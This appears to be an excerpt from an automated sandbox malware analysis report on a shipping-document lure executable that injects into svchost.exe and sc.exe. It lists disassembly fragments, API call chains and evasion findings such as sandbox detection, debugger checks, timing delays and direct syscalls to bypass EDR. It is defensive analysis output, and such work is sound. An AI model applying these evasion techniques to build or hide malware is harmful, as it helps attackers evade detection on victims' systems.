Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004F6063 push esi; retf	1_2_004F606E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004E21E1 push ss; retf	1_2_004E21E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004F4992 push ebp; iretd	1_2_004F49B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004F7A42 push ss; iretd	1_2_004F7A4C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004E73CC push ds; iretd	1_2_004E7424
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004E73D3 push ds; iretd	1_2_004E7424
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004F63A6 push 0000005Ch; iretd	1_2_004F63B2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004E3440 push eax; ret	1_2_004E3442
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004F8451 pushad ; iretd	1_2_004F8474
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004F1E78 push esp; ret	1_2_004F1E79
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004E8601 push ds; retf	1_2_004E8602
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004EAE01 push cs; ret	1_2_004EAE02
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004EA763 push 689E092Ah; ret	1_2_004EA775
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030309AD push ecx; mov dword ptr [esp], ecx	1_2_030309B6
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_0321225F pushad ; ret	6_2_032127F9
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_032127FA pushad ; ret	6_2_032127F9
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_032409AD push ecx; mov dword ptr [esp], ecx	6_2_032409B6
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_0321283D push eax; iretd	6_2_03212858
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_008B61FC push cs; iretd	6_2_008B6211
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_008BA139 push esi; ret	6_2_008BA14B
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_008BA140 push esi; ret	6_2_008BA14B
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_008BA2F3 push es; retf	6_2_008BA306
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_008B45FF push ss; iretd	6_2_008B4609

Source: C:\Program Files (x86)\AcdjiFwQZaECWnpuJMYFYYlrnRKuOgezrdeiKUUqanKdyQxGZTYTvar\dnqNlDRmfuUrS.exe

Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\SysWOW64\sc.exe"

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D68111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00D68111
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D1EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_00D1EB42

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_00D2123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00D2123A

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	API/Special instruction interceptor: Address: 1767AB4
Source: C:\Windows\SysWOW64\sc.exe	API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\sc.exe	API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\sc.exe	API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\sc.exe	API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\sc.exe	API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\sc.exe	API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\sc.exe	API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\sc.exe	API/Special instruction interceptor: Address: 7FFE2220DA44

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: AWB_5771388044 Documente de expediere.exe, 00000000.00000003.1656709984.00000000017B6000.00000004.00000020.00020000.00000000.sdmp, AWB_5771388044 Documente de expediere.exe, 00000000.00000003.1656812884.000000000182D000.00000004.00000020.00020000.00000000.sdmp, AWB_5771388044 Documente de expediere.exe, 00000000.00000002.1667793967.000000000182D000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: PROCMON.EXETH3

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_0307096E rdtsc

1_2_0307096E

Source: C:\Windows\SysWOW64\sc.exe	Window / User API: threadDelayed 1394			Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Window / User API: threadDelayed 8578			Jump to behavior

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Evaded block: after key decision

graph_0-94170

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-94992

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	API coverage: 4.4 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\sc.exe	API coverage: 2.6 %

Source: C:\Windows\SysWOW64\sc.exe TID: 3152	Thread sleep count: 1394 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe TID: 3152	Thread sleep time: -2788000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe TID: 3152	Thread sleep count: 8578 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe TID: 3152	Thread sleep time: -17156000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\sc.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\sc.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D46CA9 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00D46CA9
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D460DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	0_2_00D460DD
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D463F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	0_2_00D463F9
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D4EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00D4EB60
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D4F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00D4F5FA
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D4F56F FindFirstFileW,FindClose,	0_2_00D4F56F
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D51B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00D51B2F
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D51C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00D51C8A
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_00D51F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00D51F94
Source: C:\Windows\SysWOW64\sc.exe	Code function: 6_2_008BCA10 FindFirstFileW,FindNextFileW,FindClose,	6_2_008BCA10

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_00D1DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00D1DDC0

Source: sc.exe, 00000006.00000002.2915308329.0000000002D1F000.00000004.00000020.00020000.00000000.sdmp, dnqNlDRmfuUrS.exe, 00000007.00000002.2915841041.000000000154F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: firefox.exe, 00000008.00000002.2541850482.0000022B452CC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlloo

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	API call chain: ExitProcess graph end node			graph_0-94281
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	API call chain: ExitProcess graph end node			graph_0-93601

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\sc.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_0307096E rdtsc

1_2_0307096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_004F7DA3 LdrLoadDll,

1_2_004F7DA3

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_00D56AAF BlockInput,

0_2_00D56AAF

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_00D03D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00D03D19

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_00D33920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,

0_2_00D33920

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe

Code function: 0_2_00D1E01E LoadLibraryA,GetProcAddress,

0_2_00D1E01E

Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_01766700 mov eax, dword ptr fs:[00000030h]	0_2_01766700
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_01767D20 mov eax, dword ptr fs:[00000030h]	0_2_01767D20
Source: C:\Users\user\Desktop\AWB_5771388044 Documente de expediere.exe	Code function: 0_2_01767D80 mov eax, dword ptr fs:[00000030h]	0_2_01767D80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306A30B mov eax, dword ptr fs:[00000030h]	1_2_0306A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306A30B mov eax, dword ptr fs:[00000030h]	1_2_0306A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306A30B mov eax, dword ptr fs:[00000030h]	1_2_0306A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302C310 mov ecx, dword ptr fs:[00000030h]	1_2_0302C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03050310 mov ecx, dword ptr fs:[00000030h]	1_2_03050310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B035C mov eax, dword ptr fs:[00000030h]	1_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B035C mov eax, dword ptr fs:[00000030h]	1_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B035C mov eax, dword ptr fs:[00000030h]	1_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B035C mov ecx, dword ptr fs:[00000030h]	1_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B035C mov eax, dword ptr fs:[00000030h]	1_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B035C mov eax, dword ptr fs:[00000030h]	1_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FA352 mov eax, dword ptr fs:[00000030h]	1_2_030FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D8350 mov ecx, dword ptr fs:[00000030h]	1_2_030D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D437C mov eax, dword ptr fs:[00000030h]	1_2_030D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302E388 mov eax, dword ptr fs:[00000030h]	1_2_0302E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302E388 mov eax, dword ptr fs:[00000030h]	1_2_0302E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302E388 mov eax, dword ptr fs:[00000030h]	1_2_0302E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305438F mov eax, dword ptr fs:[00000030h]	1_2_0305438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305438F mov eax, dword ptr fs:[00000030h]	1_2_0305438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03028397 mov eax, dword ptr fs:[00000030h]	1_2_03028397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03028397 mov eax, dword ptr fs:[00000030h]	1_2_03028397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03028397 mov eax, dword ptr fs:[00000030h]	1_2_03028397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030EC3CD mov eax, dword ptr fs:[00000030h]	1_2_030EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]	1_2_0303A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030383C0 mov eax, dword ptr fs:[00000030h]	1_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030383C0 mov eax, dword ptr fs:[00000030h]	1_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030383C0 mov eax, dword ptr fs:[00000030h]	1_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030383C0 mov eax, dword ptr fs:[00000030h]	1_2_030383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B63C0 mov eax, dword ptr fs:[00000030h]	1_2_030B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DE3DB mov eax, dword ptr fs:[00000030h]	1_2_030DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DE3DB mov eax, dword ptr fs:[00000030h]	1_2_030DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DE3DB mov ecx, dword ptr fs:[00000030h]	1_2_030DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DE3DB mov eax, dword ptr fs:[00000030h]	1_2_030DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D43D4 mov eax, dword ptr fs:[00000030h]	1_2_030D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D43D4 mov eax, dword ptr fs:[00000030h]	1_2_030D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]	1_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]	1_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]	1_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]	1_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]	1_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]	1_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]	1_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]	1_2_030403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0304E3F0 mov eax, dword ptr fs:[00000030h]	1_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030663FF mov eax, dword ptr fs:[00000030h]	1_2_030663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302823B mov eax, dword ptr fs:[00000030h]	1_2_0302823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B8243 mov eax, dword ptr fs:[00000030h]	1_2_030B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B8243 mov ecx, dword ptr fs:[00000030h]	1_2_030B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302A250 mov eax, dword ptr fs:[00000030h]	1_2_0302A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03036259 mov eax, dword ptr fs:[00000030h]	1_2_03036259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030EA250 mov eax, dword ptr fs:[00000030h]	1_2_030EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030EA250 mov eax, dword ptr fs:[00000030h]	1_2_030EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03034260 mov eax, dword ptr fs:[00000030h]	1_2_03034260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03034260 mov eax, dword ptr fs:[00000030h]	1_2_03034260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03034260 mov eax, dword ptr fs:[00000030h]	1_2_03034260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302826B mov eax, dword ptr fs:[00000030h]	1_2_0302826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]	1_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]	1_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]	1_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]	1_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]	1_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]	1_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]	1_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]	1_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]	1_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]	1_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]	1_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]	1_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306E284 mov eax, dword ptr fs:[00000030h]	1_2_0306E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306E284 mov eax, dword ptr fs:[00000030h]	1_2_0306E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B0283 mov eax, dword ptr fs:[00000030h]	1_2_030B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B0283 mov eax, dword ptr fs:[00000030h]	1_2_030B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B0283 mov eax, dword ptr fs:[00000030h]	1_2_030B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030402A0 mov eax, dword ptr fs:[00000030h]	1_2_030402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030402A0 mov eax, dword ptr fs:[00000030h]	1_2_030402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h]	1_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C62A0 mov ecx, dword ptr fs:[00000030h]	1_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h]	1_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h]	1_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h]	1_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h]	1_2_030C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h]	1_2_0303A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030402E1 mov eax, dword ptr fs:[00000030h]	1_2_030402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030402E1 mov eax, dword ptr fs:[00000030h]	1_2_030402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030402E1 mov eax, dword ptr fs:[00000030h]	1_2_030402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h]	1_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DE10E mov ecx, dword ptr fs:[00000030h]	1_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h]	1_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h]	1_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DE10E mov ecx, dword ptr fs:[00000030h]	1_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h]	1_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h]	1_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DE10E mov ecx, dword ptr fs:[00000030h]	1_2_030DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030DE10E mov eax, dword ptr fs:[00000030h]	1_2_030DE10E
